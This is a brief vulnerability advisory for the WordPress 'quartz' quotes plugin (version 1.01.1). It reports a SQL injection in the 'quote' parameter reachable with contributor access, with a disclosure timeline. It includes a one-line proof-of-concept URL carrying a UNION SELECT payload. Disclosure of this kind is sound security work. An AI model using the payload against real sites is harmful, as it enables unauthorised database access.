wp-plugin : quartz

Plugin Details
Plugin Name: wp-plugin : quartz
Effected Version : 1.01.1 (and most probably lower version's if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Contributor
PoC - (Proof of Concept) :

<http://localhost/wp-admin/edit.php?page=quartz/quote_form.php&action=edit&quote=3 union select @@version,1>

Vulnerable Parameter : quote


Disclosure Timeline
Vendor Contacted : 2013-12-26
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[ Quartz Plugin lets you show random quotes/tips/links/pictures/something to visitors. These quotes can be added from the admin side. ]